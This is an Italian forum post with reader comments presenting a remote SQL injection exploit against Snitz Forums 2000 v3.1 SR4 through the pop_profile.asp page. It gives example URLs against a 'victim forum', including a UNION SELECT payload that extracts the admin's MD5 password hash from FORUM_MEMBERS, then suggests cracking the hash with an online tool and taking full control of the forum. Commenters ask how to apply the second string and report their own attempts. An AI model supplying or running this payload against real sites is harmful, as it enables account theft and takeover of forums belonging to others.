Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.
Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:
trovare l’username dell’Admin:
aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1
esempio: http://forumvittima.it/pop_profile.asp?mode=display&id=1
vi comparirà il nick dell’Admin;
trovare la password dell’Admin:
aggiungere all’indirizzo del forum vittima pop_profile.asp?
mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9
,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!
Bye Bye 
e sapessi quanti forum ancora in piedi con questa piattaforma bah
ma la seconda stringa dove và scritta di preciso???
potresti fare un esempio come quello della prima stringa???
grazie in anticipo:::!!!!
Ciao,
ho provato il procedimento che hai descritto, la passwd sono riuscita a recuperarla, lo username no.. e mi trovo tra 2 fuochi, il committente che non sa che cosa sia una passwd e il vecchio webmaster che per vendetta non me la vuole dare
Qualche consiglio?
Tks
quando metto la seconda stringa mi dice invalid ID.vuol dire che hanno fixato il bug in qualche modo?